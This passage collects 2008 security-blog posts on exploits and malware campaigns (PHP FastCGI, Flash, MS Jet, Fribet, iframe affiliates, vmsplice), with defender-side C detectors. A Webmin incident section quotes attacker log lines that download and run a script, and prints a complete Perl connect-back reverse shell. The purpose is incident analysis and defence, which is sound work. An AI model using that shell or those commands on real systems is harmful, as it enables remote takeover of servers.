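/* Safe version of the concatenation, sized with fixed_len. Caller frees. */
static char *build_path_info(const char *script_path, const char *env_path_info)
{
    size_t ptlen = strlen(script_path);
    size_t n = fixed_len(ptlen, env_path_info);
    char *buf = malloc(n + 1);
    if (!buf) return NULL;
    memcpy(buf, script_path, ptlen);
    if (env_path_info) memcpy(buf + ptlen, env_path_info, n - ptlen);
    buf[n] = '\0';
    return buf;
}

int main(void)
{
    const char *script = "/var/www/index.php";   /* constructed script path */
    const char *pi = "/aa";                       /* PATH_INFO of "GET /index.php/aa" */
    char *joined = build_path_info(script, pi);

    printf("buggy size %zu, fixed size %zu, bytes written past the buggy buffer: %zu\n",
           buggy_len(strlen(script), pi), fixed_len(strlen(script), pi),
           overflow_bytes(buggy_len, script, pi));
    printf("%s\n", joined);
    free(joined);
    return 0;
}
```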

This is one of the classic examples of small human errors (which can sometimes be even typos) that result in vulnerabilities.

We reported this issue to the PHP dev team almost immediately after we came to know about it in the wild, and they’ve just come out with a patch. We highly recommend that users update to the latest version, PHP 5.2.6. Besides this issue, the release fixes a host of other security-related bugs, some of which we deem critical. This specific issue affects the FastCGI packages of PHP.

This issue has been given the identifier CVE-2008-0599.

We shall continue to monitor this threat and update if we come across anything malicious.

NULL Pointer Exploitation Causes Concern

Some news is in circulation regarding a recently disclosed (and patched) vulnerability in Adobe’s Flash. The attack used dereferenced NULL pointers, which were believed to be very hard to exploit.

The findings were first revealed in a paper called “Application-Specific Attacks: Leveraging the ActionScript Virtual Machine” (PDF) by Mark Dowd. The paper described a new technique for causing an exploitable memory corruption vulnerability in Adobe’s Flash. Whilst the technique has targeted the ActionScript Virtual Machine for the Win32/Intel platform, it’s understood that the attack could be carried out on any other platform where Flash is available. The real question is whether this attack can be made more generic to target dereferenced NULL pointers in general!

It is possible to do so, but it’s not that easy. There are certain conditions an exploit of this type has to satisfy before reaching the ultimate goal. Dowd used some wacky techniques to inject malicious ActionScript byte code into Flash runtime (basically by crafting an SWF with something to trigger the vulnerability and point the execution to another loaded-in-memory part of the file that had the malicious content). Then he forced malloc() to fail by trying to allocate some huge memory chunk. When malloc() failed, it returned NULL.

(OK, at this step a program trying to access a NULL pointer would basically crash, and something to check for malloc() return value is necessary to prevent that crash.)

In this case, Flash didn’t check for malloc() failure and did some pointer arithmetic operation to add the value of the pointer (NULL here) to some offset. Now, this “offset” was controllable, and this is where Dowd had preloaded his malicious content. (Don’t get too excited, folks. There were quite a few other conditions that Dowd’s exploit had to meet before loading his payload. But I’m eliminating a lot of details to present the overall picture). So now we have a pretty successful and reproducible exploit on Flash ActionScript VM. It even bypassed Vista’s ASLR because Vista’s Flash was compiled with the runtime security bit off.

Now, scaling this attack against native code is more difficult, in spite of the success it had against the ActionScript VM. We would still be looking for a controllable offset and a place to preload our payload. Nevertheless, it is still a neat discovery when taking into consideration the level of complexity needed to load the malicious payload.

This discovery reflects a trend that it is possible to circumvent runtime security countermeasures such as ASLR and the like by targeting other environments with higher privileges running on top of the native platform. And if you’re involved in any secure development lifecycle, you’d better go and check your code!

Potential Microsoft Works ActiveX Zero-Day Surfaces

A Microsoft Works ActiveX potential zero-day threat has been disclosed on a handful of Chinese blog sites. This threat was originally posted as a proof of concept that caused a Windows host to crash, but very soon after, a working exploit was posted. (Show of hands: Who’s surprised?)

Here’s the meat of this: The flaw lies in an ActiveX component of Microsoft Works Image Server (WkImgSrv.dll). Yes, it appears successful exploitation would allow for code execution via a controlled pointer. For this to occur, the victim would need to visit a malicious Web site.

On the plus side, this control is not marked safe, and attempts to use it should be accompanied by a warning from Internet Explorer. Even so, you will want to set the kill bit for clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6 to help mitigate. Initial testing on Windows XP SP2 and Internet Explorer 7 shows this to be easily exploitable once past the “warning” hurdle.

In the meantime, McAfee Avert Labs will continue researching this issue.

Update: June 6, 2008
Microsoft has confirmed that exploitation of this issue is not possible due to the control not being safe for scripting, nor safe for initialization. They have a nicely written, thorough write-up here explaining why.

Good Offense Not the Best Anti-Virus Defense

There was an interesting article in InformationWeek this morning about a couple of security researchers who have presented the possibility of using offensive technologies to go after hackers. The most recent was Joel Eriksson from Bitsec, who presented at RSA last week about exploiting security holes in remote-access Trojans.

The article also brings up a five-year-old example of an earlier attempt at offensive technology to be used against hackers. In this case, Tom Liston created a tool called LaBrea (after the tar pits) that would ensnare computers which were being used to attack it either intentionally or due to worm infection.

There are plenty of people within the security industry who would like to be able to employ these tactics. The urge to take a pound of flesh for the late nights and weekends spent dealing with malware attacks is certainly understandable. But I know very few people in this industry who actually think it’s a sound idea, or worth the potential legal trouble.

Just as there are few locales where it is legal for you to shoot an intruder in your home, there are few locales where it is legal for you to attack those who intrude on your computer. Even in those locales where it is not illegal to attack an intruder, you must take into consideration the possible court costs. It’s highly likely the survivor (either the intruder or a family member) will sue you, and it will take some time with a lawyer to defend yourself against these charges. It’s entirely possible that a hacker or a worm-infected user would do likewise.

This is still assuming that your case was reasonably clear-cut, that it was genuinely a hacker or worm infection that was coming after you. It could just as easily be used as a sort of alternate flavor of Denial of Service attack–spoof the traffic or exploit a machine for the purpose of making it a target.

The general computing population is not particularly knowledgeable about the inner workings of their machines; some say there should be licensing such as for driving a car. It’s my opinion that there would first have to be this sort of licensing, and then a permit akin to a “Concealed Carry Permit” before this could be considered a good idea.

The Internet is a scary enough place without adding even more unskilled attackers.

MS08-021 Exploit Activity Increasing

Last week, during our monthly Patch Tuesday podcast, we discussed the fact that Microsoft credited three different researchers for reporting CVE-2008-1087. The fact that several independent researchers reported the issue suggested that others may not be far behind. This CVE pertains to the Microsoft Graphics Rendering Engine, which has a history of exploitation. In fact, McAfee’s Exploit-WMF detection for MS06-001 exploits was one of the top reported detections around the time that a patch was released. An exploit toolkit was released prior to the patch, which helped contribute to the number of exploits floating around. History may be repeating itself, though out of sequence.

Last Friday the first MS08-021 exploit was discovered in the field, three days after the issue was patched; and though it was not widespread, the discovery of the exploit did highlight the fact that attackers were actively working with exploit code. Today a basic exploit toolkit was posted publicly; and while this new toolkit is primitive, it may very well lead to “one-upmanship” and the distribution of a more powerful tool.

Given the fact that a patch was released prior to this recent exploit activity it is unlikely that MS08-021 attacks will reach the level of MS06-001 attacks. However, there are still many many vulnerable systems out there, and we’ve seen prevalent exploits that have lasted for years after the issue was patched.

Fribet - Attacking Your Backend Database from Your Backyard

Just a month ago, we blogged about massive security incidents, relating to SQL injection attacks, that insert iframe links to remote sites that host exploit scripts and malware. Recently, we discovered the Fribet trojan, where the author was riding on both the success of such attacks and the controversy of the Tibet issue. The trojan was discovered on Pro-Tibet sites that were possibly hijacked to host Exploit-MS07-004, which appear to be specifically crafted.

When visitors of the pro-Tibet websites are infected, the Fribet trojan provides remote control and monitoring functions such as creating new files or folders, starting or terminating processes, and sending/receiving additional malware. Additionally, the Fribet trojan loads the “SQL Native Client” ODBC library, and is designed to receive arbitrary SQL statements from a command and control server. In turn, the ODBC library provides the functionality to Fribet to bind SQL connections and run arbitrary SQL commands from the victim machine(s). At the time of our research, the command and control server was not sending us commands. However, our reverse engineering of the malicious code shows it is more than capable of the following:

  • Bind and connect to local or remote databases from the victim machine
  • Query and steal data from local or remote databases
  • Insert arbitrary data into local or remote databases, including web data such as hosting a web exploit

The attacker still needs to find out the information required to connect to the database, such as DSN, hostname, database name, user and password; however, that information can be collected via other monitoring functions of Fribet, and it can also enumerate weak and default values.

This trojan can apparently be used as an alternative to SQL injection attacks, but in a more direct way. Even the administrators of secure web sites, protected against common SQL injection attacks, should ensure that database backends are equally secure to defend against such a penetration vector.

Webmin SessionID Hacking

I made some interesting observations recently while looking through Webmin logs. It seems that someone was playing with Webmin worm/autorooter tools. Here is a piece of the webmin log:

root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;hostname'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;hostname'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;uname -a;id;uptime'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;unset HISTFILE HISTLOG HISTSAVE SCREEN'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;ls'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;wget aa.bb.cc/d.pl'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;cat /etc/issue'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;perl d.pl 2.2.2.2 2008'

Here we can see some suspicious activity. In particular, the Webmin root user connecting from 1.1.1.1 and trying to download and execute a perl script from aa.bb.cc on the system hosting Webmin. The script contained code to execute a shell + connect back to 2.2.2.2 on port 2008.

#!/usr/bin/perl
use Socket;
print "Data [removed] Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] \n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "" x 4;
exit(0);
}
print "[*] Datached\n\n";

By examining the Webmin log in further detail, it was possible to determine that the attacker used an older Webmin vulnerability (“Webmin Arbitrary File Disclosure Vulnerability”, CVE-2006-3392) to retrieve the webmin.log & sessiondb.pag files.

1.1.1.1 - - [02/Feb/2008:06:31:34 +0800] "GET /unauthenticated/ [lots ..%01/..%01/] /var/webmin/webmin.log HTTP/1.0" 200 390944
1.1.1.1 - - [02/Feb/2008:06:31:42 +0800] "GET /unauthenticated/ [lots ..%01/..%01/] /var/webmin/sessiondb.pag HTTP/1.0" 200 1024

The attacker then tried to access Webmin’s /shell/index.cgi page as follows:

1.1.1.1 - root [02/Feb/2008:06:31:46 +0800] "POST /shell/index.cgi HTTP/1.1" 200 4921

We know that access to /shell/index.cgi requires authentication using a valid Webmin user and corresponding password. However, we see that the attacker was able to access this resource without supplying a password (we see that the HTTP response code is 200). It turns out that this was possible because Webmin stores user session ID values in the webmin.log & sessiondb.pag files. If an attacker can retrieve these files then they can re-use the session ID of a user to access resources as that user without having to supply a password.

For example, here is an entry in webmin.log:

[04/02/2008 15:26:59] root f3fe4b90803a41096af8880e2e948a24 x.x.x.x proc run.cgi "run" "-" "-" cmd='ifconfig -a' input='' mode='0'

“f3fe4b90803a41096af8880e2e948a24″ is the session ID in this entry. These session IDs are valid for one week unless a user explicitly logs out of the Webmin interface by clicking the “logout” link. Since most users don’t do this, most session IDs continue to be valid long after they are needed. An attacker using a file disclosure vulnerability such as the one described above can attempt to retrieve + reuse these session IDs to impersonate users. The ability to impersonate users in this manner can lead to complete compromise of affected systems (because /shell/index.cgi can be used to execute arbitrary commands).

If you still run a vulnerable Webmin, you should update it immediately, or rename the “/shell/index.cgi” script to prevent an attacker from executing arbitrary commands, since this attack vector has become automated and is already actively used in the wild.
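As an added defender-side example (not Webmin’s code), the following scans webmin.log entries for a session ID that turns up from more than one source IP, which is the replay pattern described above; the lines in SAMPLE_LOG are constructed to mirror the entry format shown, and the field widths are assumptions for this illustration.

```c
#include <stdio.h>
#include <string.h>

#define SID_LEN 32            /* Webmin session IDs are 32 hex characters */
#define IP_LEN  45            /* room for an IPv6 literal */
#define MAX_SESSIONS 64

/* One tracked session: its ID and the first source IP it was seen from. */
struct session {
    char sid[SID_LEN + 1];
    char ip[IP_LEN + 1];
    int reused;               /* set once a second, different IP uses the ID */
};

/* Constructed sample webmin.log lines (not from any real system). The first
 * two are the legitimate admin; the next two replay the same session ID
 * from another address, as in the incident described above. */
static const char *SAMPLE_LOG[] = {
    "[04/02/2008 15:26:59] root f3fe4b90803a41096af8880e2e948a24 10.0.0.5 proc run.cgi \"run\" \"-\" \"-\" cmd='ifconfig -a'",
    "[04/02/2008 15:30:12] root f3fe4b90803a41096af8880e2e948a24 10.0.0.5 proc index.cgi \"view\" \"-\" \"-\"",
    "[04/02/2008 23:41:03] root f3fe4b90803a41096af8880e2e948a24 1.1.1.1 shell index.cgi \"run\" \"-\" \"-\" cmd='hostname'",
    "[04/02/2008 23:41:09] root f3fe4b90803a41096af8880e2e948a24 1.1.1.1 shell index.cgi \"run\" \"-\" \"-\" cmd='uname -a;id'",
    "[04/02/2008 23:45:00] admin 0123456789abcdef0123456789abcdef 10.0.0.7 useradmin index.cgi \"view\" \"-\" \"-\"",
};
#define SAMPLE_LOG_LEN (sizeof(SAMPLE_LOG) / sizeof(SAMPLE_LOG[0]))

/* Pull user, session ID and source IP out of one line. Lines with or
 * without the leading "[dd/mm/yyyy hh:mm:ss]" field are accepted.
 * Returns 1 on success, 0 if the line does not have the expected shape. */
static int parse_line(const char *line, char *sid, char *ip)
{
    char user[64];
    const char *p = line;

    if (*p == '[') {
        p = strchr(p, ']');
        if (!p) return 0;
        p++;
    }
    /* field widths keep sscanf inside the buffers (it appends the NUL) */
    if (sscanf(p, "%63s %32s %45s", user, sid, ip) != 3) return 0;
    return strlen(sid) == SID_LEN;
}

/* Convenience wrapper for callers that only want a validity check. */
static int line_is_wellformed(const char *line)
{
    char sid[SID_LEN + 1], ip[IP_LEN + 1];
    return parse_line(line, sid, ip);
}

/* Walk the log, remembering the first IP seen per session ID and marking
 * any ID later used from a different IP. Returns how many IDs were reused;
 * out[] receives at most max_out sessions (further new IDs are skipped). */
static int find_reused_sessions(const char **lines, size_t n,
                                struct session *out, size_t max_out)
{
    size_t count = 0;
    int reused = 0;

    for (size_t i = 0; i < n; i++) {
        char sid[SID_LEN + 1], ip[IP_LEN + 1];
        size_t k;

        if (!parse_line(lines[i], sid, ip)) continue;
        for (k = 0; k < count; k++)
            if (strcmp(out[k].sid, sid) == 0) break;

        if (k == count) {                          /* first sighting of this ID */
            if (count == max_out) continue;
            strcpy(out[count].sid, sid);
            strcpy(out[count].ip, ip);
            out[count].reused = 0;
            count++;
        } else if (!out[k].reused && strcmp(out[k].ip, ip) != 0) {
            out[k].reused = 1;                     /* same ID, new address */
            reused++;
        }
    }
    return reused;
}

/* Run the detector over the constructed sample and return the reused count. */
static int sample_reused_count(void)
{
    struct session table[MAX_SESSIONS];
    return find_reused_sessions(SAMPLE_LOG, SAMPLE_LOG_LEN, table, MAX_SESSIONS);
}

int main(void)
{
    struct session table[MAX_SESSIONS] = {{{0}}};
    int n = find_reused_sessions(SAMPLE_LOG, SAMPLE_LOG_LEN, table, MAX_SESSIONS);

    printf("%d session ID(s) used from more than one address\n", n);
    for (size_t i = 0; i < MAX_SESSIONS; i++)
        if (table[i].sid[0] && table[i].reused)
            printf("  %s first seen from %s\n", table[i].sid, table[i].ip);
    return 0;
}
```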

Again with the spoofing…

A vulnerability has popped up (no pun intended…really) in Internet Explorer (IE) — or at least is claimed by a researcher named Juan Pablo Lopez Yacubian on the popular Bugtraq mailing list. It allows one to spoof the address of a popup without affecting the underlying page. This means that a bad guy could send the victim a legitimate link, have them follow it, and popup a spoofed window when they land on the attacker-controlled site (or hacked legitimate site). If this popup window is enticing enough, the attacker could persuade the victim to disclose information, click malicious links, or do other nefarious stuff.

There are a good number of fairly obvious caveats for successful exploitation, however. First off, the victim must allow scripts to run; otherwise IE blocks it. Second, even if scripts are allowed, a good popup blocker should be able to stop the window from popping up. Next, any click within the body of the popup will reveal the true identity of the address. Lastly, to be aesthetically pleasing, the address is limited to a certain character length.

All in all, this is nothing really spectacular…

That said, the main point here is to remind you to be sure to have basic browser protection (script blocking, trusted-domain model, popup blockers, etc.) in place and use common sense when you receive unsolicited links and unexpected popups.

Safe surfing…

RussianCash

Last week, I read some interesting news on an Australian website, The Age. A journalist explained that a Russian malware distribution site offered a haul of 1000 spyware-infected Australian machines for 100 USD, double the price offered for US machines and 30 times more than those from Asia.

Searching this site, I discovered the InstallsCash partnership program:

It was a well-known dishonest offer: after registration, the affiliate had to put a short one-line iframe code on his website pages. Next, as explained in the FAQ, this hidden iframe would be used to silently redirect any visitor to another website to install the affiliation program (via an MPack-like process). Each successful installation made from the affiliate site would involve a payment.

To cover their tracks, the InstallsCash registrar is from China (bizcn.com). The fake registrant address is in the US (Iowa City) and the e-mail contact is in Russia (ydwrtyxamz_at_mail.ru). It is easy to understand that this last name was randomly chosen. We will surely encounter some others in our investigations!

Being curious and to clearly demonstrate the dishonesty of the offer, I decided to subscribe myself by using some fake data to fill in the proposed form:

This screenshot is interesting; it lists the allowed system of payments. Here we recognize all the regular ones the cybercriminals are using. Having done that, I had to wait for 24 hours:

This Saturday at wake up, I tried my luck and attempted a connection. They activated my registration and my personal iframe code waited for me:

As I discussed first, the iframe I had to hide on my website pointed at another website using a strange name, randomly chosen and created using a more or less automated method I discussed in a previous blog entry. It seems the affiliator creates or uses a different one for each affiliate. Thanks to these unique names, the software recognizes each of them. Data can be fed into their stats page and then they can calculate the payments.

On my personal page, the top white window contained my iframe. In the middle the affiliator gave me the same one, but in an encrypted form. It was not explained, but it was clear I had to use this one on my pages to mislead or avoid some security technologies. The distributor goes so far as to say, and I quote, “they will be updating every 3 days and they will be invisible for every antivirus!”

The whois gave me the result I expected, which was something similar to InstallsCash.com:

Registrar was bizcn.com and registrant contact came with another improbable e-mail address:
Jan Dendinger ycsmmiqtyo_at_mail.ru
Phone +1 3196433xxx Fax: +13.196433xxx
309 East Main Street
West Branch IA 523581
us

Some quick searches with Google allowed me to find many other similar sites.

I looked at my stats page. Of course it was blank:

While The Age announced $100 per 1000 unique loads, my rate table quoted half that, and only $3 for Asia:

But the journalist was right, in my private windows message as well as on the main page I could read InstallsCash made some special offer since February 16th: they increased their rates “for USA by 2 and any mix of country was about 30$”:

However, I note the price is still low compared with the payments these guys proposed in September 2006. But at that time, Australian and UK PCs were the most wanted:

Yes, it seems that the same people are hidden behind InstallsCash, IframeCash (September 2006) and IframeDollars (November 2007). To understand this you can, for example, compare the FAQs:

In November 2007, the RBNExploit blog discussed that iFrameCash and iFrameDollars were possibly linked to the Russian Business Network. This confirms that RBN trading partners are still in business. And if they propose commissions for deliberately planting malicious iframes, as they have been doing for several years, believe me, it is because it is a lucrative business.

Finally please note that via its ScriptScan module, McAfee VirusScan blocks and detects the PHP script as JS/Exploit-BO.gen. Moreover, the invisible files :-) are detected as Downloader-BDH.

More analysis on the MS Jet Exploits camouflaging as Microsoft Word files

Recently, we blogged about MS Access exploits being delivered through Microsoft Word. In this blog we dig deeper, to see the structure of the files used in this attack, and analyze how the payload is delivered.

In the following example, the threat arrived as 2 files with “.doc” extensions (xxx1.doc and xxx2.doc); however, one of the files is actually a Microsoft Access database containing the MS Jet exploit. The whole story is depicted in Figure 1.


Figure 1: The flow of the trojan installation process

When users open the MS Word file xxx1.doc, the MS Access file xxx2.doc is loaded through the data link properties. Then the shellcode in the xxx2.doc file runs (triggered by the MS Jet exploit in the same file) and decodes itself in typical fashion. The shellcode launches WinWord.exe to open the innocent Word file embedded in xxx1.doc.

While the shellcode opens the Word file, it also decodes the executable file embedded in xxx1.doc. The decoding consists of a simple XOR with a mask of 0xFF, plus deobfuscation of the first 8 bytes of the MZ header, which are masked with an XOR mask of 0xAF.

You can see the data link aspect of xxx1.doc by placing the xxx2.doc file in a different folder from xxx1.doc. When users open xxx1.doc, the “Data Link Properties” window appears. The specified database name is the path containing xxx2.doc and the password is empty. Because of this data link, xxx2.doc is typically loaded silently.

The trojan installation techniques used in this threat are nothing special and can be seen in other exploit files; however, the method used to trick users in this attack, using non-exploit OLE files as loaders of other exploit OLE files, is something new. As we see from past attacks, we can no longer rely on file extensions. We should continue to be careful with all unknown OLE files and not open untrusted email attachments.

Microsoft Jet Database Engine Attacked Through Word

A few weeks ago we blogged about recent MS Access exploits being nothing new. Well, there is now something new.

On the heels of Symantec blogging about a new tandem Word document/Access database exploit, Microsoft released Security Advisory (950627). As we stated before, Microsoft considers MDB files to be unsafe. Accordingly, Microsoft email clients prevent users from double-clicking MDB (Microsoft Access Database) files. Until recently, attackers typically exploited MS Jet DB vulnerabilities through MDB files, and therefore Microsoft stuck to their “MDB files are unsafe” story. Well, that’s changed.

In several recent, yet limited, attacks, exploits were crafted to attack an MS Jet Database vulnerability through Word. The Word docs are coded to reference Access database files regardless of extension (which allows attackers to circumvent content filters looking for specific email attachment extensions).

An attack scenario looks like this:

  1. A user receives an email message with 2 attachments (one of which is a Word document)
  2. The email client saves the attachments to the same directory
  3. The user opens the Word document, which in turn opens the Access database containing the exploit code

In another scenario the attackers have archived both the database and Word document in a ZIP file, but the principle is the same.

Microsoft states that Msjet40.dll versions greater than 4.0.9505.0 are not vulnerable, which means this issue was (silently) fixed for Windows Server 2003 SP2 and Windows Vista.

McAfee DAT files version 5256 (released March 20) detect all known Access exploits as Exploit-MSJet.

Reported Zero-Day in CA Software

Here’s a quick post about a claimed zero-day vulnerability in CA BrightStor ARCserve Backup, software that provides backup functionality for Windows systems. Proof-of-concept exploit code for this vulnerability is public.

A specially crafted Web page could trigger a stack overflow in the AddColumn() method in the ListCtrl ActiveX Control. For an attack to occur, a user would have to be tricked into visiting a malicious Web site. The exploit writer states that he has successfully run his attack code against CA BrightStor ARCserve Backup r11.5, with Internet Explorer 6 running on Microsoft Windows XP SP2 (the Polish edition).

McAfee Avert Labs is analyzing the flaw. As an aside, our research database reveals that the last known vulnerability in CA BrightStor ARCserve Backup was disclosed on November 26, 2007: CVE-2007-5328. CA worked with the discloser to release a patch for the vulnerability on the same day.

Another Mass Attack Underway

On the heels of recent iframe attacks, we’re currently tracking another mass compromise. This attack involves injecting script into valid web pages to include a reference to a malicious .JS file (sometimes in the BODY, other times in the TITLE section). The .JS file uses script to write an IFRAME, which loads an HTML file that attempts to exploit several vulnerabilities, including:

  • MS06-014
  • RealPlayer (ActiveX Control)
  • Baofeng Storm (ActiveX Control)
  • Xunlei Thunder DapPlayer (ActiveX Control)
  • Ourgame GLWorld GlobalLink Chat (ActiveX Control)

This is one of those cascading threats, where one page leads to another and another, which leads to an executable, which leads to another and another. At least one of the payload trojans targets online gamers.

Preliminary research results suggest more than 10,000 pages were affected by this hack attack.

Similar attacks have been observed in the past; most notably, the infamous “Dolphin Stadium” (aka Super Bowl) attack was similar, and was later connected with SQL injection as the method the attackers used to inject their malicious code. In cases where the TITLE tag has been modified, the browser’s title bar will show the script reference:


Example of browser title bar (censored)
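The title-bar symptom above is also something a defender can check for mechanically. The C program below is an added example, not code from the original post: it flags an HTML page whose TITLE element contains an injected SCRIPT tag and pulls out the external .js reference it points to. The two sample pages, and the host name inside them, are constructed for this example and are not real indicators from the attack.

```c
/*
 * Added example (not from the original post): flag an HTML page whose <title>
 * element has had a <script> tag injected into it, the symptom described above,
 * and pull out the external .js reference it points to.  The sample pages and
 * the host name in them are constructed for this example.
 */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Case-insensitive strstr; returns a pointer into hay, or NULL. */
static const char *stristr(const char *hay, const char *needle)
{
    size_t n = strlen(needle);
    for (; *hay; hay++)
        if (strncasecmp(hay, needle, n) == 0)
            return hay;
    return NULL;
}

/*
 * Returns 1 if a <script ...> tag appears between <title> and </title>, else 0.
 * When src is non-NULL, the tag's src attribute value (if any) is copied into
 * it, truncated to srclen - 1 bytes; src is set to "" when nothing is found.
 */
int script_in_title(const char *html, char *src, size_t srclen)
{
    if (src && srclen)
        src[0] = '\0';

    const char *t_open = stristr(html, "<title");
    if (!t_open)
        return 0;
    const char *t_close = stristr(t_open, "</title>");
    if (!t_close)
        t_close = html + strlen(html);   /* unterminated title: scan to end */

    const char *s = stristr(t_open, "<script");
    if (!s || s >= t_close)
        return 0;

    const char *a = stristr(s, "src=");
    if (src && srclen && a && a < t_close) {
        a += 4;
        if (*a == '"' || *a == '\'')
            a++;
        size_t i = 0;
        while (a[i] && a[i] != '"' && a[i] != '\'' && a[i] != '>' &&
               !isspace((unsigned char)a[i]) && i < srclen - 1) {
            src[i] = a[i];
            i++;
        }
        src[i] = '\0';
    }
    return 1;
}

/* Convenience wrapper returning the injected src from a static buffer ("" if none). */
const char *injected_script_src(const char *html)
{
    static char buf[256];
    script_in_title(html, buf, sizeof buf);
    return buf;
}

/* Constructed sample pages (the .js host is a placeholder, not a real IoC). */
static const char CLEAN_PAGE[] =
    "<html><head><title>Acme Widgets</title></head>"
    "<body><script src=\"/js/menu.js\"></script></body></html>";

static const char INJECTED_PAGE[] =
    "<html><head><TITLE>Acme Widgets"
    "<SCRIPT src=\"http://malicious.example/m.js\"></SCRIPT></TITLE></head>"
    "<body></body></html>";

int main(void)
{
    printf("clean page:    %d\n", script_in_title(CLEAN_PAGE, NULL, 0));
    printf("injected page: %d (src=%s)\n", script_in_title(INJECTED_PAGE, NULL, 0),
           injected_script_src(INJECTED_PAGE));
    return 0;
}
```

A script tag inside TITLE is never legitimate, which is why this check produces no false positives on the clean page even though that page loads its own script from the BODY; the BODY variant of the injection needs a comparison against a known-good copy of the page instead.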

McAfee’s designations for the various pieces of malware include:

  • Downloader-BGX
  • Exploit-RealPlay
  • JS/Exploit-BO.gen
  • VBS/Psyme

Analysis is ongoing.

Microsoft Access Exploits Nothing New

Recently our friends at PandaLabs published a blog post stating that a new Microsoft Access exploit had been found in the wild. We did some research on this exploit and found it actually targets an older, well-known vulnerability, CVE-2005-0944, found by the HexView team in March 2005. This vulnerability is very easy to exploit. We observed similar exploits last year, and the dropper used in this case looks very similar to that one.

Microsoft considers MDB files to be unsafe, so no specific patch for this vulnerability has been released in the 3 years since it was made public.

The interesting thing about this vulnerability is that it lies in msjet40.dll, which has never been updated on Windows XP SP2 since the release of MS04-014 (for other platforms, please check http://support.microsoft.com/kb/239114).

In this specific case, the dropper uses a jump address in mswstr10.dll, which is part of the MS JET 4.0 engine package. So for XP SP2 users the trojan gets executed in almost all cases, no matter which version of Office XP or 2003 is in use. We tested Office 2007, 2003 and XP and found that only Office 2007 was immune to this vulnerability.

McAfee AV detects this recent exploit with DAT 5236, released February 22, and our IntruShield NIPS sensors can detect and block it with our generic protection signature for MS Access, “HTTP: Microsoft Jet DB Engine Buffer Overflow”, released on November 13, 2007.

Since Microsoft doesn’t patch Access-related vulnerabilities, we highly recommend Office users never open untrusted MDB files.

The Release of Sage 3 - The Globalization of Malware

Today at Avert Labs, we released the third edition of Sage - our security journal. As always, we strive to be a bit different with our content in Sage. A little provocative, new trends, new ideas… And this issue is no different.

In this issue we look at the growing trend of localization in malware and threats. Cybercriminals are increasingly crafting attacks in multiple languages and are exploiting popular local applications to maximize their profits. Cybercrooks have become extremely deft at learning the nuances of the local regions and creating malware specific to each country. They’re not just skilled at computer programming—they’re skilled at psychology and linguistics, too.

We examined global malware trends in this report, titled “One Internet, Many Worlds.” The report is based on data compiled by our international security experts and examines the globalization of threats and the unique threats in different countries and regions. In the report, we detail the following trends and conclusions:

  • Sophisticated malware authors have increased country-, language-, company-, and software-specific attacks
  • Cyberattackers are increasingly attuned to cultural differences and tailor social engineering attacks accordingly
  • Cybercrime rings recruit malware writers in countries with high unemployment and high levels of education such as Russia and China
  • Cybercriminals take advantage of countries where law enforcement is lax
  • Around the world, malware authors are exploiting the viral nature of Web 2.0 and peer-to-peer networks
  • More exploits than ever before are targeted at locally popular software and applications

Download Sage 3

Analyzing the Linux Kernel vmsplice Exploit

Zero-day emerges

On February 9, zero-day exploit code [1] was posted on the milw0rm site. It exploited a vulnerability in Linux kernel versions 2.6.17 to 2.6.24.1 that allows an unprivileged local user to gain root privileges. The vulnerability was assigned CVE-2008-0600. There are reports that this exploit is reliable and actively used in the wild. The inner workings of this exploit are quite interesting from a technical point of view; let’s have a look.

Details on the vulnerability and methods of exploitation

The vulnerability lies in the get_iovec_page_array function (in fs/splice.c; line numbers are from the 2.6.23.1-42.fc8 kernel), reachable from the vmsplice() system call:

1286:       if (unlikely(!len)) // "len" variable is under user's control
1287:               break;
...
1296:       off = (unsigned long) base & ~PAGE_MASK;
...
1306:       npages = (off + len + PAGE_SIZE - 1) >> PAGE_SHIFT;
1307:       if (npages > PIPE_BUFFERS - buffers)
1308:               npages = PIPE_BUFFERS - buffers;
1309:
1310:       error = get_user_pages(current, current->mm,
1311:                              (unsigned long) base, npages, 0, 0,
1312:                              &pages[buffers], NULL);

The get_user_pages function expects its fourth argument (the number of page descriptors to fill, which also bounds the return value) to be at least 1. The preceding code assumes that npages is at least 1: len must be nonzero, so off + len + PAGE_SIZE - 1 should be greater than or equal to PAGE_SIZE. However, if len is close to UINT32_MAX, the off + len + PAGE_SIZE - 1 computation wraps around, and npages can be zero.

As a result, get_user_pages may return more than PIPE_BUFFERS entries, and the pages array will overflow. However, the overflow payload is not controlled by the attacker, so it would be difficult to turn this overflow into reliable code execution.
